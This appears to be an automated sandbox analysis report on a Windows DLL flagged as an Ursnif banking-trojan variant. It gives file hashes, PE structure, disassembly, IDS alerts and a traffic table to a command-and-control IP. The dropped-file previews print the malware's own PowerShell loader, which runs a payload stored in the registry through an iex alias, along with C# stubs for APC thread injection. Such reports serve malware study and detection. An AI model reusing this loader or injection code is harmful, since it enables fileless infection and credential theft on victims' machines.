                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text
                              Category:dropped
                              Size (bytes):403
                              Entropy (8bit):5.058106976759534
                              Encrypted:false
                              SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                              MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                              SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                              SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                              SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                              Malicious:false
                              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.

                              C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                              Category:dropped
                              Size (bytes):369
                              Entropy (8bit):5.182200628670966
                              Encrypted:false
                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f52wn0zxs7+AEszIwkn23f52sH:p37Lvkmb6KRfh2q0WZEifh2m
                              MD5:8CB0C7CD433BDC2F02299B6932B4A9E3
                              SHA1:00663A78D6DAD361F367FD49A112A56B5C7DFA2B
                              SHA-256:97DB1A8D4B63512E0C57B113E1F95D861B1FBE14D394B9888480BFB2AD6C3F13
                              SHA-512:3072FB0116DB38CBF12CBDBA7D6820DA0C401A7FD7BBB37ACA9564985A3C3F8363D54F0807E06FC2B94D2C9D2B2F94D7E7D74A5B40A1B2C0227CDE522CDBB902
                              Malicious:false
                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.0.cs"

                              C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):3584
                              Entropy (8bit):2.6207839132053006
                              Encrypted:false
                              SSDEEP:24:etGSo8OmU0t3lm85xWAseO4zxQ64pfUPtkZfi1VUWI+ycuZhN6xakSl2PNnq:6iXQ3r5xNOeQfUuJiT31ulQa3cq
                              MD5:1F0860CDD9E8F6B4501F25728D2131B6
                              SHA1:1126BDC01913B693028ECB663123381889362DA8
                              SHA-256:3CABCC304A4FA671400D71EBEB21F846983224F97AF93BE2CF2AADA6E3B3E34B
                              SHA-512:E8CD254CCF26A063BD36EF34299F7B9C86450E2A2ED9A958E77F05DE1C829470B0EE6129FA00745ED6A0D8DD9379DB384FF7F704BC5820BBC29A30C0A8F4BCA5
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.rb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........

                              C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.out

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):866
                              Entropy (8bit):5.307968253776901
                              Encrypted:false
                              SSDEEP:24:AId3ka6KRfPVEif8KaM5DqBVKVrdFAMBJTH:Akka6CPVEu8KxDcVKdBJj
                              MD5:CEA73A1E9F1D1CC3A29CF5AAE996602A
                              SHA1:6BF6258A16B4750D4B37D33FF17D8FF99D11ADC9
                              SHA-256:C232D4309AA78DB4C1FA7E017FA57BFED2E1B05E10090C27DB13BAEB9EE41CC7
                              SHA-512:1125BFEC36CDE86F8C6DAC261F366C90723A22633D78C87C03B4048C45D009E18E7602CD9E22029B388E7B57DF0319143756D33449710CEECC21FEC822ED427A
                              Malicious:false
                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                              C:\Users\user\Documents\20220504\PowerShell_transcript.506013.O71O_fmz.20220504162805.txt

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1343
                              Entropy (8bit):5.36590430076155
                              Encrypted:false
                              SSDEEP:24:BxSAI7vBZbx2DOXUWYJobduLCHdV4qWQHjeTKKjX4CIym1ZJXxJobduLCHdV4rN+:BZmvjboO4JobdRdV4tQqDYB1ZDJobdRb
                              MD5:3FD39DAE5C6C053C927C7C421DF22346
                              SHA1:648958C510D633CECD2033A0B76B04A2B8CA6993
                              SHA-256:733ABC0BC0C57B87100F55CA1BB3FDCE133B892BF619D86F1C11A2891C3E844E
                              SHA-512:8DC2BF906F650828FCE8EEC6D7C05B9D5B00DD8044CE5FBD1B7E0220220DBE646C37D118DD9CE6DD886E141EB4A691B43963C214665E03EFAEB55E3C86C5AA1C
                              Malicious:false
                              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220504162806..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 506013 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6644..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220504162806..**********************..PS>new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.E

                              Static File Info

                              General

                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.2386475978649285
                              TrID:
                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:xaj0e933Uv.dll
                              File size:442368
                              MD5:69e570a35f63ea12cbad7a10b25a6ea4
                              SHA1:f0ca60563eeb9098ad6133daa1fc48c3987437e2
                              SHA256:3362915be3f3ed1572f4ba757d155608f54a460fd935bfe3f37138cf0fe383b6
                              SHA512:85658f8418f40fa9f24934b26aa45550dd8fb34425d0af342511b4e64975614071535e99257497f69db25fa87a5cde271bc4a6e1a0971a287f7f2d497d2374ca
                              SSDEEP:6144:rxpWDRyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rxpuFlJqYhiVDwGU8OqaX1WW3zNg7
                              TLSH:D494F14977A11DBBEC0807761CF8C52B9B66BE2CA23A70DEA6683CFF7E175511048706
                              File Content Preview:MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5......

                              File Icon

                              Icon Hash:9068eccc64f6e2ad

                              Static PE Info

                              General

                              Entrypoint:0x401430
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:0bedc9af0ed7cf2ba33cf662a24d448e

                              Entrypoint Preview

                              Instruction
                              push ebp
                              mov ebp, esp
                              add ecx, FFFFFFFFh
                              call 00007F4F08B3F6FCh
                              pop eax
                              pop eax
                              mov dword ptr [00414544h], eax
                              mov edx, dword ptr [00414660h]
                              sub edx, 00005289h
                              call edx
                              ret
                              int3
                              push esi
                              mov eax, ebx
                              mov dword ptr [00414540h], eax
                              pop dword ptr [00414538h]
                              mov dword ptr [00414548h], ebp
                              mov dword ptr [0041453Ch], edi
                              sub dword ptr [00414548h], FFFFFFFCh
                              loop 00007F4F08B3F6A5h
                              mov dword ptr [ebp+00h], eax
                              nop
                              ret
                              lea ecx, ebx
                              pop es
                              mov ds, word ptr [ecx]
                              lodsb
                              lea ebp, dword ptr [ecx+6B2EEEC3h]
                              movsb
                              xchg eax, esi
                              xchg dword ptr [ebx], esp
                              shl byte ptr [C2100869h], 1
                              loopne 00007F4F08B3F698h
                              pop eax
                              or ecx, dword ptr [ebx-5F28A8CFh]
                              pop ebx
                              je 00007F4F08B3F716h
                              sbb dword ptr [esi], eax
                              sbb bh, dh
                              mov ebp, A52AB60Ah
                              xor al, F7h
                              sbb eax, 442A8BDAh
                              mov edx, 8289DCF1h
                              wait
                              sub byte ptr [eax-20h], dh
                              pop ecx
                              or esi, edi
                              xchg eax, esp
                              loop 00007F4F08B3F757h
                              xchg eax, edi
                              sti
                              cmp eax, 3B0AD66Fh
                              dec ebp
                              mov esp, E193F8C3h

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xdc180x8c.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x9f28.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000xf0c.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xd0b00x38.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0xd0000xb0.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x10000x1.text
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xb7100xc000False0.0735880533854data1.02187881889IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rdata0xd0000x10730x2000False0.18017578125data3.71231531364IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xf0000x79d00x6000False0.373657226562data6.02583875365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .crt0x170000x1dc8e0x1e000False0.988427734375data7.9815287954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .erloc0x350000x2ca4f0x2d000False0.988259548611data7.98122243943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .rsrc0x620000x9f280xa000False0.602783203125data6.51663069246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x6c0000x132e0x2000False0.219360351562data3.73577949218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              RT_BITMAP0x623600x666dataEnglishUnited States
                              RT_ICON0x629c80x485dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                              RT_ICON0x672280x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544EnglishUnited States
                              RT_ICON0x697d00xea8dataEnglishUnited States
                              RT_ICON0x6a6780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                              RT_ICON0x6af200x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                              RT_DIALOG0x6b4880xb4dataEnglishUnited States
                              RT_DIALOG0x6b5400x120dataEnglishUnited States
                              RT_DIALOG0x6b6600x158dataEnglishUnited States
                              RT_DIALOG0x6b7b80x202dataEnglishUnited States
                              RT_DIALOG0x6b9c00xf8dataEnglishUnited States
                              RT_DIALOG0x6bab80xa0dataEnglishUnited States
                              RT_DIALOG0x6bb580xeedataEnglishUnited States
                              RT_GROUP_ICON0x6bc480x4cdataEnglishUnited States
                              RT_VERSION0x6bc980x290MS Windows COFF PA-RISC object fileEnglishUnited States

                              Imports

                              DLLImport
                              KERNEL32.dllEraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak
                              OLEAUT32.dllGetRecordInfoFromTypeInfo, LoadTypeLibEx
                              USER32.dllDefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo
                              GDI32.dllExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment
                              ADVAPI32.dllEnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA
                              msvcrt.dllstrcoll, fgetwc, srand

                              Version Infos

                              DescriptionData
                              LegalCopyright A Company. All rights reserved.
                              InternalName
                              FileVersion1.0.0.0
                              CompanyNameA Company
                              ProductName
                              ProductVersion1.0.0.0
                              FileDescription
                              OriginalFilenamemyfile.exe
                              Translation0x0409 0x04b0

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              05/04/22-16:27:54.122082 05/04/22-16:27:54.122082TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976980192.168.2.4185.189.151.28
                              05/04/22-16:27:53.231327 05/04/22-16:27:53.231327TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976980192.168.2.4185.189.151.28
                              05/04/22-16:27:53.642851 05/04/22-16:27:53.642851TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976980192.168.2.4185.189.151.28
                              05/04/22-16:27:33.120656 05/04/22-16:27:33.120656TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976080192.168.2.413.107.43.16

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              May 4, 2022 16:27:53.212703943 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.229989052 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.230151892 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.231327057 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.248414040 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.534866095 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.534919977 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.534966946 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.534984112 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.535002947 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.535007954 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.535043955 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.535058022 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.535069942 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.535089970 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.535105944 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.535140991 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.535150051 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.535165071 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.535206079 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.535248995 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.535300016 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.535312891 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.535350084 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.535361052 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.535375118 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.535397053 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.535409927 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.535456896 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.552704096 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.552772999 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.552818060 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.552848101 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.552889109 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.552930117 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.552931070 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.552967072 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.552967072 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553004980 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553009033 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553046942 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553076029 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553114891 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553153992 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553158045 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553183079 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553217888 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553225994 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553267956 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553271055 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553298950 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553302050 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553318024 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553338051 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553379059 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553400993 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553409100 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553436041 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553447008 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553486109 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553498030 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553514004 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553534031 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553555965 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553599119 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553606033 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553649902 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553690910 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553807020 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553848982 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553863049 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.553879023 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.553915977 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.554440975 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.554519892 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.570719004 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.570779085 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.570816994 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.570862055 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.570903063 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.570933104 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.570971012 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571021080 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571029902 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571050882 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571090937 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571101904 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571151018 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571155071 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571188927 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571219921 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571260929 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571269035 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571300030 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571307898 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571341038 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571369886 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571386099 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571408033 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571448088 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571450949 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571487904 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571517944 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571530104 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571577072 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571593046 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571615934 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571656942 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571656942 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571696043 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571707964 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571724892 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571763992 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571763992 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571804047 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571810961 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571846008 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571887016 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571887970 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571899891 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571913958 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571953058 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.571974993 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.571994066 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572032928 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572046995 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572072983 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572089911 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572101116 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572140932 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572150946 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572182894 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572222948 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572223902 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572263002 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572273016 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572290897 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572314024 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572329998 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572364092 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572369099 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572407007 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572407961 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572448015 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572453022 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572506905 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572506905 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572546959 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572565079 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572604895 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572642088 CEST4976980192.168.2.4185.189.151.28
                              May 4, 2022 16:27:53.572645903 CEST8049769185.189.151.28192.168.2.4
                              May 4, 2022 16:27:53.572684050 CEST4976980192.168.2.4185.189.151.28
